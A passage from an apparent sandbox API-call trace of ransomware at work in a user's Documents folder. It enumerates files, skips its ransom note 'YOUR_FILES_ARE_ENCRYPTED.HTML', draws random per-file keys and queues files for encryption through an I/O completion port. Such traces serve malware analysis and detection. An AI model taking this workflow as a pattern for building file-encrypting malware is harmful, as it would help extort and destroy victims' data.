dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.251] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=3495) returned 1 [0167.251] GetProcessHeap () returned 0x270000 [0167.251] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.252] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="C9") returned 2 [0167.252] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="91") returned 2 [0167.252] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="FA") returned 2 [0167.252] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="1C") returned 2 [0167.252] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="F7") returned 2 [0167.252] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="B8") returned 2 [0167.252] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="D9") returned 2 [0167.252] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="2A") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="B9") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="A7") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="B2") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="2C") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="FC") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="EC") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="D6") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="55") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="8C") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="69") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="EF") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="F5") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="43") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="62") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="9B") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="70") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="0C") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="68") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="0E") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="33") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="EA") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="99") returned 2 [0167.253] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="64") returned 2 [0167.254] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="19") returned 2 [0167.254] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\VO8vnxVyqWP zR.xlsx" [0167.254] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.254] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.264] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b28e50, ftCreationTime.dwHighDateTime=0x1d7dcb7, ftLastAccessTime.dwLowDateTime=0x825f4d50, ftLastAccessTime.dwHighDateTime=0x1d7e4e0, ftLastWriteTime.dwLowDateTime=0x825f4d50, ftLastWriteTime.dwHighDateTime=0x1d7e4e0, nFileSizeHigh=0x0, nFileSizeLow=0x157d9, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="wi9CmCQ.pptx", cAlternateFileName="WI9CMC~1.PPT")) returned 1 [0167.264] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx") returned 46 [0167.264] lstrcmpW (lpString1="wi9CmCQ.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.264] PathFindExtensionW (pszPath="wi9CmCQ.pptx") returned=".pptx" [0167.264] lstrlenW (lpString=".pptx") returned 5 [0167.264] PathFindExtensionW (pszPath="wi9CmCQ.pptx") returned=".pptx" [0167.264] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx" (normalized: "c:\\users\\5alr3u30d3\\documents\\wi9cmcq.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.265] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=88025) returned 1 [0167.265] GetProcessHeap () returned 0x270000 [0167.265] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.266] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="E0") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="EA") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="8B") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="58") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="0A") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="A9") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="20") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="8A") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="D9") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="71") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="9C") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="E3") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="DB") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="63") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="4E") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="43") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="98") returned 2 [0167.266] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="07") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="CD") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="95") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="5C") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="3F") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="BF") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="B5") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="CA") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="70") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="04") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="40") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="FB") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="1B") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="CC") returned 2 [0167.267] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="75") returned 2 [0167.268] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\wi9CmCQ.pptx" [0167.268] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.268] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.276] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbae4c400, ftCreationTime.dwHighDateTime=0x1d7d137, ftLastAccessTime.dwLowDateTime=0xa14c1e60, ftLastAccessTime.dwHighDateTime=0x1d7e688, ftLastWriteTime.dwLowDateTime=0xa14c1e60, ftLastWriteTime.dwHighDateTime=0x1d7e688, nFileSizeHigh=0x0, nFileSizeLow=0x197c, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="zgPO1s6dkb.docx", cAlternateFileName="ZGPO1S~1.DOC")) returned 1 [0167.278] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx") returned 49 [0167.278] lstrcmpW (lpString1="zgPO1s6dkb.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0167.278] PathFindExtensionW (pszPath="zgPO1s6dkb.docx") returned=".docx" [0167.278] lstrlenW (lpString=".docx") returned 5 [0167.278] PathFindExtensionW (pszPath="zgPO1s6dkb.docx") returned=".docx" [0167.278] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx" (normalized: "c:\\users\\5alr3u30d3\\documents\\zgpo1s6dkb.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.279] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=6524) returned 1 [0167.279] GetProcessHeap () returned 0x270000 [0167.279] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.280] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="99") returned 2 [0167.280] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="05") returned 2 [0167.280] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="65") returned 2 [0167.280] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="ED") returned 2 [0167.280] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="79") returned 2 [0167.280] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="14") returned 2 [0167.280] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="41") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="7A") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="4C") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="05") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="04") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="94") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="6F") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="AC") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="92") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="F0") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="C5") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="2C") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="77") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="76") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="E7") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="47") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="0C") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="28") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="E6") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="C0") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="BB") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="1F") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="2B") returned 2 [0167.281] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="85") returned 2 [0167.282] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="4B") returned 2 [0167.282] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="5A") returned 2 [0167.282] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zgPO1s6dkb.docx" [0167.282] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.282] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.287] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1535f30, ftCreationTime.dwHighDateTime=0x1d7e750, ftLastAccessTime.dwLowDateTime=0xcab9bec0, ftLastAccessTime.dwHighDateTime=0x1d7e78b, ftLastWriteTime.dwLowDateTime=0xcab9bec0, ftLastWriteTime.dwHighDateTime=0x1d7e78b, nFileSizeHigh=0x0, nFileSizeLow=0xb6d2, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="zHVfqFS9ZJabb9iU.xlsx", cAlternateFileName="ZHVFQF~1.XLS")) returned 1 [0167.291] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx") returned 55 [0167.291] lstrcmpW (lpString1="zHVfqFS9ZJabb9iU.xlsx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0167.291] PathFindExtensionW (pszPath="zHVfqFS9ZJabb9iU.xlsx") returned=".xlsx" [0167.291] lstrlenW (lpString=".xlsx") returned 5 [0167.291] PathFindExtensionW (pszPath="zHVfqFS9ZJabb9iU.xlsx") returned=".xlsx" [0167.291] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx" (normalized: "c:\\users\\5alr3u30d3\\documents\\zhvfqfs9zjabb9iu.xlsx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.292] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=46802) returned 1 [0167.292] GetProcessHeap () returned 0x270000 [0167.292] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.293] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="20") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="71") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="50") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="A3") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="78") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="5C") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="CE") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="8C") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="DD") returned 2 [0167.293] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="A2") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="A8") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="58") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="49") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="46") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="23") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="9F") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="3B") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="28") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="D7") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="5D") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="66") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="91") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="1A") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="CF") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="7A") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="8B") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="D4") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="79") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="FA") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="78") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="89") returned 2 [0167.294] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="73") returned 2 [0167.295] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\zHVfqFS9ZJabb9iU.xlsx" [0167.295] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.295] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.306] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa10419c0, ftCreationTime.dwHighDateTime=0x1d7dbd0, ftLastAccessTime.dwLowDateTime=0x6693590, ftLastAccessTime.dwHighDateTime=0x1d7e494, ftLastWriteTime.dwLowDateTime=0x6693590, ftLastWriteTime.dwHighDateTime=0x1d7e494, nFileSizeHigh=0x0, nFileSizeLow=0x15756, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="ZSOjcpxzwxusjl.pdf", cAlternateFileName="ZSOJCP~1.PDF")) returned 1 [0167.306] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf") returned 52 [0167.306] lstrcmpW (lpString1="ZSOjcpxzwxusjl.pdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 1 [0167.306] PathFindExtensionW (pszPath="ZSOjcpxzwxusjl.pdf") returned=".pdf" [0167.306] lstrlenW (lpString=".pdf") returned 4 [0167.306] PathFindExtensionW (pszPath="ZSOjcpxzwxusjl.pdf") returned=".pdf" [0167.307] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0167.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf" (normalized: "c:\\users\\5alr3u30d3\\documents\\zsojcpxzwxusjl.pdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0167.308] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=87894) returned 1 [0167.308] GetProcessHeap () returned 0x270000 [0167.308] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0167.309] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="C9") returned 2 [0167.309] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="BC") returned 2 [0167.309] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="48") returned 2 [0167.309] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="6F") returned 2 [0167.309] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="65") returned 2 [0167.309] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="C1") returned 2 [0167.309] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="58") returned 2 [0167.309] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="55") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="16") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="24") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="BB") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="F6") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="A4") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="0D") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="59") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="30") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="2E") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="0D") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="92") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="A7") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="87") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="17") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="F7") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="FF") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="A3") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="7D") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="42") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="97") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="64") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="B5") returned 2 [0167.310] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="6C") returned 2 [0167.311] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="7D") returned 2 [0167.311] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\ZSOjcpxzwxusjl.pdf" [0167.311] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0167.311] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0167.331] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11925970, ftCreationTime.dwHighDateTime=0x1d7dc05, ftLastAccessTime.dwLowDateTime=0xaae23350, ftLastAccessTime.dwHighDateTime=0x1d7e495, ftLastWriteTime.dwLowDateTime=0xaae23350, ftLastWriteTime.dwHighDateTime=0x1d7e495, nFileSizeHigh=0x0, nFileSizeLow=0x5e94, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="_ DUv9WKDNJMEUH.ots", cAlternateFileName="_DUV9W~1.OTS")) returned 1 [0167.331] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\_ DUv9WKDNJMEUH.ots") returned 53 [0167.331] lstrcmpW (lpString1="_ DUv9WKDNJMEUH.ots", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0167.332] PathFindExtensionW 